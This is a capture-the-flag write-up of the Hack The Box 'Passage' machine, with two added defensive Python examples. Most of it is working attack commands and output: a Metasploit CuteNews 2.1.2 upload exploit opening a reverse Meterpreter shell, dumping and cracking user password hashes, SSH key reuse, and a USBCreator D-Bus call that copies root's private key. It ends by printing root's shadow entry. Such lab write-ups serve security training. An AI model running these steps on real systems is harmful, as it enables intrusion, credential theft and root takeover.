#reconnaissance
| nmap
So, I start as usual, with nmap:
$ nmap -A -sV -sC -v -oN passage_nmap --min-rate=10000 10.10.10.206
A few seconds later I get a report:
# Nmap 7.80 scan initiated Wed Sep 16 18:44:17 2020 as: nmap -A -sV -sC -v -oN passage_nmap --min-rate=10000 10.10.10.206
Nmap scan report for 10.10.10.206
Host is up (0.054s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
|   256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
|_  256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Passage News
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 16 18:44:26 2020 -- 1 IP address (1 host up) scanned in 9.87 seconds
Not much, but enough. Let's look at port 80.
First, add a hosts entry:
echo "10.10.10.206 passage.htb" | sudo tee -a /etc/hosts
#enumeration
| web

The footer identifies the site as CuteNews CMS. Second, we see that URL fuzzing is not an option, because fail2ban bans the scanner.
Walking through the site, we find the login page and learn that the site is running CuteNews version 2.1.2.

Register here, and let's look for exploits with searchsploit:
$ searchsploit cutenews 2.1.2
which finds:
Exploit Title                                                  | Path
CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit)   | php/remote/46698.rb
CuteNews 2.1.2 - Arbitrary File Deletion                       | php/webapps/48447.txt
CuteNews 2.1.2 - Authenticated Arbitrary File Upload           | php/webapps/48458.txt
#exploitation
| cutenews-rce
In Personal options there is the possibility to upload an avatar for my profile:

So, I will try the exploit "CuteNews 2.1.2 - 'avatar' Remote Code Execution". First, find the module directory of msf:
locate metasploit | grep "multi/"
Then go to /usr/share/metasploit-framework/modules/exploits/multi/http/ and mirror the exploit into that directory:
searchsploit -m 46698
Rename it, for example:
sudo mv 46698.rb cutenews_212_rce.rb
Also, this script has an error: the comma at the end of the following line is missing and needs to be added:
['URL', 'http://pentest.com.tr/exploits/CuteNews-2-1-2-Remote-Code-Execution-Metasploit.html'],
Start msfconsole in a terminal and configure the module:
msf5 > search cutenews
msf5 > use 0
msf5 exploit(multi/http/cutenews_212_rce) > set RHOSTS 10.10.10.206
msf5 exploit(multi/http/cutenews_212_rce) > set PASSWORD 123321!@#
msf5 exploit(multi/http/cutenews_212_rce) > set USERNAME user
msf5 exploit(multi/http/cutenews_212_rce) > run
Here I use my own username and password. Don't forget to check your LHOST 🙂
msf5 exploit(multi/http/cutenews_212_rce) > run
[*] Started reverse TCP handler on 10.10.19.30:4444
[*] http://10.10.10.206:80 - CuteNews is 2.1.2
[+] Authentication was successful with user: user
[*] Trying to upload kgxhvyei.php
[+] Upload successfully.
[*] Sending stage (38288 bytes) to 10.10.10.206
[*] Meterpreter session 1 opened (10.10.19.30:4444 -> 10.10.10.206:33594) at 2020-09-16 23:43:29 -0400
meterpreter > shell
Process 2351 created.
Channel 0 created.
whoami
www-data
And get a TTY: python -c "import pty; pty.spawn('/bin/bash')"
#privilege escalation

| user
Looking around, we see that the machine has two users under /home:
* Nadav
* Paul
We can list Paul's directory, which contains user.txt, but directory listing of Nadav's home is not allowed.
So, after more enumeration, I found a set of base64-encoded files in /var/www/html/CuteNews/cdata/users. Let's decode them:
for line in $(cat *|grep -v php);do echo -n $line | base64 -d && echo "\r"; done
www-data@passage:/var/www/html/CuteNews/cdata/users$ for line in $(cat *|grep -v php);do echo -n $line | base64 -d && echo "\r"; done
a:1:{s:2:"id";a:1:{i:1598829833;s:6:"egre55";}}\r
a:1:{s:4:"name";a:1:{s:5:"admin";a:8:{s:2:"id";s:10:"1592483047";s:4:"name";s:5:"admin";s:3:"acl";s:1:"1";s:5:"email";s:17:"nadav@passage.htb";s:4:"pass";s:64:"7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1";s:3:"lts";s:10:"1592487988";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}\r
a:1:{s:2:"id";a:1:{i:1592483281;s:9:"sid-meier";}}\r
a:1:{s:2:"id";a:1:{i:1592483236;s:10:"paul-coles";}}\r
a:1:{s:4:"name";a:1:{s:9:"sid-meier";a:9:{s:2:"id";s:10:"1592483281";s:4:"name";s:9:"sid-meier";s:3:"acl";s:1:"3";s:5:"email";s:15:"[email protected]";s:4:"nick";s:9:"Sid Meier";s:4:"pass";s:64:"4bdd0a0bb47fc9f66cbf1a8982fd2d344d2aec283d1afaebb4653ec3954dff88";s:3:"lts";s:10:"1592485645";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}\r
a:1:{s:2:"id";a:1:{i:1592483047;s:5:"admin";}}\r
a:1:{s:4:"name";a:1:{s:10:"paul-coles";a:9:{s:2:"id";s:10:"1592483236";s:4:"name";s:10:"paul-coles";s:3:"acl";s:1:"2";s:5:"email";s:16:"paul@passage.htb";s:4:"nick";s:10:"Paul Coles";s:4:"pass";s:64:"e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd";s:3:"lts";s:10:"1592485556";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}\r
a:1:{s:4:"name";a:1:{s:9:"kim-swift";a:9:{s:2:"id";s:10:"1592483309";s:4:"name";s:9:"kim-swift";s:3:"acl";s:1:"3";s:5:"email";s:15:"[email protected]";s:4:"nick";s:9:"Kim Swift";s:4:"pass";s:64:"f669a6f691f98ab0562356c0cd5d5e7dcdc20a07941c86adcfce9af3085fbeca";s:3:"lts";s:10:"1592487096";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"3";}}}\r
a:1:{s:4:"name";a:1:{s:6:"egre55";a:11:{s:2:"id";s:10:"1598829833";s:4:"name";s:6:"egre55";s:3:"acl";s:1:"4";s:5:"email";s:15:"[email protected]";s:4:"nick";s:6:"egre55";s:4:"pass";s:64:"4db1f0bfd63be058d4ab04f18f65331ac11bb494b5792c480faf7fb0c40fa9cc";s:4:"more";s:60:"YToyOntzOjQ6InNpdGUiO3M6MDoiIjtzOjU6ImFib3V0IjtzOjA6IiI7fQ==";s:3:"lts";s:10:"1598834079";s:3:"ban";s:1:"0";s:6:"avatar";s:26:"avatar_egre55_spwvgujw.php";s:6:"e-hide";s:0:"";}}}\r
a:1:{s:2:"id";a:1:{i:1592483309;s:9:"kim-swift";}}\r
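The shell one-liner above does the job, but it is hard to read and it does not tell you what the records actually contain. The following is an added example, not code from the original post and not CuteNews' own code: a small Python reader for the PHP serialize() subset that CuteNews stores base64-encoded in cdata/users, used as an audit that reports, per account, whether the stored password hash is a bare 64-hex digest (unsalted SHA-256), the weakness that makes the john step later in this post possible. The sample records, user names, e-mail addresses, hashes and the `<?php die` guard line are all constructed for the demo; the parser handles only the array, string, integer and boolean types that appear in the dump.

```python
import base64
import hashlib
import re


def php_unserialize(data: str, pos: int = 0):
    """Parse one PHP-serialized value starting at `pos`; return (value, next_pos).

    Only the types seen in CuteNews user files are supported: a (array),
    s (string), i (integer), b (boolean). `data` is decoded as latin-1 so
    that PHP's byte lengths match character offsets.
    """
    t = data[pos]
    if t in "ib":
        end = data.index(";", pos)
        raw = data[pos + 2:end]
        return (int(raw) if t == "i" else raw == "1"), end + 1
    if t == "s":
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                                  # skip ':"'
        return data[start:start + length], start + length + 2  # skip '";'
    if t == "a":
        colon = data.index(":", pos + 2)
        count = int(data[pos + 2:colon])
        pos = colon + 2                                    # skip ':{'
        result = {}
        for _ in range(count):
            key, pos = php_unserialize(data, pos)
            value, pos = php_unserialize(data, pos)
            result[key] = value
        return result, pos + 1                             # skip '}'
    raise ValueError(f"unsupported PHP type {t!r} at offset {pos}")


HEX64 = re.compile(r"^[0-9a-f]{64}$")            # bare SHA-256 hex digest, no salt
B64LINE = re.compile(r"^[A-Za-z0-9+/]+=*$")      # a base64 record line


def audit_user_records(lines):
    """Decode each base64 line of a CuteNews users file and report, per account,
    whether the stored password hash is a bare 64-hex (unsalted SHA-256) digest."""
    findings = []
    for line in lines:
        line = line.strip()
        if not B64LINE.match(line):                # guard line, blanks, etc.
            continue
        record, _ = php_unserialize(base64.b64decode(line).decode("latin-1"))
        by_name = record.get("name")
        if not isinstance(by_name, dict):          # 'id' index records carry no credentials
            continue
        for username, fields in by_name.items():
            findings.append({
                "user": username,
                "acl": fields.get("acl"),
                "email": fields.get("email"),
                "unsalted_sha256": bool(HEX64.match(fields.get("pass", ""))),
            })
    return findings


# Constructed sample in the same shape as the dump above. Names, e-mails and the
# bcrypt-looking value are invented; the SHA-256 is computed from a made-up password.
ALICE_HASH = hashlib.sha256(b"constructed-password").hexdigest()
SAMPLE_RECORDS = [
    'a:1:{s:2:"id";a:1:{i:1592483047;s:5:"alice";}}',
    'a:1:{s:4:"name";a:1:{s:5:"alice";a:4:{s:4:"name";s:5:"alice";s:3:"acl";s:1:"1";'
    's:5:"email";s:21:"alice@example.invalid";s:4:"pass";s:64:"' + ALICE_HASH + '";}}}',
    'a:1:{s:4:"name";a:1:{s:3:"bob";a:4:{s:4:"name";s:3:"bob";s:3:"acl";s:1:"3";'
    's:5:"email";s:19:"bob@example.invalid";s:4:"pass";s:9:"$2y$10$xx";}}}',
]
SAMPLE_FILE = ["<?php die(); ?>"] + [
    base64.b64encode(r.encode()).decode() for r in SAMPLE_RECORDS
]


if __name__ == "__main__":
    for f in audit_user_records(SAMPLE_FILE):
        flag = "UNSALTED SHA-256" if f["unsalted_sha256"] else "ok"
        print(f"{f['user']:<12} acl={f['acl']} {f['email']:<24} {flag}")
```

Run against a real cdata/users directory by passing the file's lines to `audit_user_records`; the function ignores the PHP guard line just as the `grep -v php` in the one-liner does. The point of the audit is the last column: an account whose `pass` field is a plain 64-hex string is protected only by an unsalted SHA-256, which is exactly why a wordlist attack on it succeeds in seconds.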
Let's pay attention to these lines:
nadav@passage.htb:7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1
paul@passage.htb:e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd
hashid and CyberChef both identify them as SHA-256.
Crack these hashes with john: sudo john --format=Raw-SHA256 paul.hash
paul@passage.htb:atlanta1
Here I get user.txt in the console.
www-data@passage:/var/www/html/CuteNews/cdata/users$ su paul
Password: atlanta1
paul@passage:/var/www/html/CuteNews/cdata/users$ cat ~/user.txt
fc95b90a67c62195dc0072fbf39d2613
| user2
In ~/.ssh we find the private key id_rsa. I copy it to my PC and do:
$ chmod 600 paul_id_rsa
$ ssh -i paul_id_rsa nadav@passage.htb
Btw, nadav's key is in paul's .ssh/authorized_keys, so nadav can ssh into user paul without a password. Maybe paul's key works the other way round too.
And it does! 😉
| root
Here I enumerate SUID binaries:
find / -perm -u=s -type f 2>/dev/null
nadav@passage:~$ find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/umount
/bin/ntfs-3g
/bin/ping
/bin/su
/bin/fusermount
/bin/ping6
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/xorg/Xorg.wrap
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper
/usr/sbin/pppd
Among them is a program worth a closer look: dbus-daemon-launch-helper.
nadav@passage:~$ ps -aux | grep dbus
message+   690  0.0  0.1  44144  4948 ?        Ss   21:41   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
nadav     1030  0.0  0.1  43608  4052 ?        Ss   21:41   0:00 dbus-daemon --fork --session --address=unix:abstract=/tmp/dbus-diaukgiUGY
nadav     1077  0.0  0.0  39860   300 ?        S    21:41   0:00 upstart-dbus-bridge --daemon --system --user --bus-name system
nadav     1082  0.0  0.0  39860   296 ?        S    21:41   0:00 upstart-dbus-bridge --daemon --session --user --bus-name session
nadav     1135  0.0  0.1  42896  4056 ?        S    21:41   0:00 /usr/bin/dbus-daemon --config-file=/etc/at-spi2/accessibility.conf --nofork --print-address 3
lp        2039  0.0  0.1  81244  5640 ?        S    21:46   0:00 /usr/lib/cups/notifier/dbus dbus://
nadav     2504  0.0  0.0  21292  1004 pts/19   S+   22:34   0:00 grep --color=auto dbus
Googling "gdbus privilege escalation" turns up https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/, which explains the issue:
This tool can be used, among other things, to copy files between locations. The input to the method _builtin_dd is taken directly from user input. Furthermore, no path sanitation checks are performed on the source or target path, and no password prompts are being used – this allows a user to overwrite arbitrary files on the filesystem, as root, with no password prompting.
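To make the quoted description concrete from the defender's side, here is an added example (not code from this post, from Unit 42, or from the usb-creator project): a Python sketch of the path handling a privileged D-Bus helper should apply before copying a file on a caller's behalf, next to a stub that behaves the way the article describes. The allowed target roots, the constructed uid used to stand in for a different caller, and the temporary files are all assumptions of the demo; polkit authorisation in front of the method is a separate layer that is not shown.

```python
import os
import stat
import tempfile


def caller_can_read(path: str, caller_uid: int, caller_gids=()) -> bool:
    """DAC check made on the caller's behalf: a root helper must not read
    something the requesting user could not read on their own."""
    st = os.stat(path)
    if st.st_uid == caller_uid:
        return bool(st.st_mode & stat.S_IRUSR)
    if st.st_gid in caller_gids:
        return bool(st.st_mode & stat.S_IRGRP)
    return bool(st.st_mode & stat.S_IROTH)


def path_within(path: str, roots) -> bool:
    """Confine a target path after resolving symlinks and '..', so a link
    planted inside an allowed directory cannot redirect the write elsewhere."""
    real = os.path.realpath(path)
    for root in roots:
        root = os.path.realpath(root)
        if real == root or real.startswith(root.rstrip(os.sep) + os.sep):
            return True
    return False


def vulnerable_image_check(source: str, target: str, caller_uid: int) -> bool:
    # The behaviour the article describes: caller-supplied paths go straight
    # to the copy with no sanitisation and no authorisation prompt.
    return True


def hardened_image_check(source: str, target: str, caller_uid: int, allowed_roots) -> bool:
    """Allow the copy only if the caller may read the source and the resolved
    target lies inside one of the directories the helper is meant to serve."""
    try:
        if not caller_can_read(source, caller_uid):
            return False
    except OSError:          # missing source, permission error on stat, ...
        return False
    return path_within(target, allowed_roots)


def demo():
    """Constructed scenario: a private 0600 file (standing in for a root-only
    secret), one allowed target directory, and a symlink inside that directory
    pointing back outside it. Returns the decision for each case."""
    with tempfile.TemporaryDirectory() as tmp:
        allowed = os.path.join(tmp, "media")
        os.mkdir(allowed)
        secret = os.path.join(tmp, "secret_key")
        with open(secret, "w") as fh:
            fh.write("private\n")
        os.chmod(secret, 0o600)
        escape = os.path.join(allowed, "escape")
        os.symlink(tmp, escape)                    # link inside the allowed root -> outside
        owner = os.getuid()
        other = owner + 1                          # constructed uid for a different caller
        inside = os.path.join(allowed, "copy.img")
        return {
            "vulnerable_other_user": vulnerable_image_check(secret, inside, other),
            "owner_inside": hardened_image_check(secret, inside, owner, [allowed]),
            "other_user": hardened_image_check(secret, inside, other, [allowed]),
            "outside_root": hardened_image_check(secret, os.path.join(tmp, "copy.img"), owner, [allowed]),
            "symlink_escape": hardened_image_check(secret, os.path.join(escape, "copy.img"), owner, [allowed]),
        }


if __name__ == "__main__":
    for case, allowed in demo().items():
        print(f"{case:<24} {'ALLOW' if allowed else 'DENY'}")
```

The two checks that matter are the ones the article says were missing: the source is tested against the caller's own permissions rather than the helper's, and the target is resolved with `realpath` before it is compared with the allowed roots, so neither `..` nor a symlink lets the write land in a place like `/root/.ssh`. The stub `vulnerable_image_check` approves everything, which is what makes the `gdbus call` in the next step work.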
Get and use root's id_rsa:
nadav@passage:/tmp$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/id_rsa true
Last step: connect as root and read root.txt.
nadav@passage:/tmp$ ssh -i id_rsa root@passage.htb
Last login: Wed Sep 16 22:07:27 2020 from 10.10.16.31
root@passage:~# cat root.txt
b4de9b8a65de547814015a1d71cb2f05
root@passage:~# cat /etc/shadow | grep root
root:$6$mjc8Tvgr$L56bn5KQDtOyKRdXBTL4xcmT7FVWJbds.Fo0FVc11PWliaNu5ASAxKzaEddyaYGMxGQPUNo5UpxT/nawzS8TW0:18464:0:99999:7:::